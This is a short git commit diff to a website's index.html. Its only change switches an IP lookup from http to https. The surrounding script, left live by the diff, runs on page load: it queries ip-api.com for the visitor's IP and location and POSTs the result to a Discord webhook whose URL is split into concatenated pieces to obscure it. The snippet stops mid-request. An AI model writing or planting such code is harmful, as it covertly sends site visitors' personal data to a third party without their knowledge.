fix shit part 2

--- a/index.html
+++ b/index.html
@@ -162,7 +162,7 @@
 <script type="text/javascript">
 if(location.href==="https://memastermind.tk/"){location.href = "https://mastermind.tk"}
 url = "https://discord.com/ap"+"i/webhooks/10660371740"+"19043359/RD08fANiei7ZqUludvAvxBYMF_c"+"kcmjdio5diLmssSGM_E1YttKMAnzX8O2mukrJa277"
-fetch('http://ip-api.com/json/')
+fetch('https://ip-api.com/json/')
     .then(results => results.json())    
     .then(data => fetch(url, {
         method: 'POST',
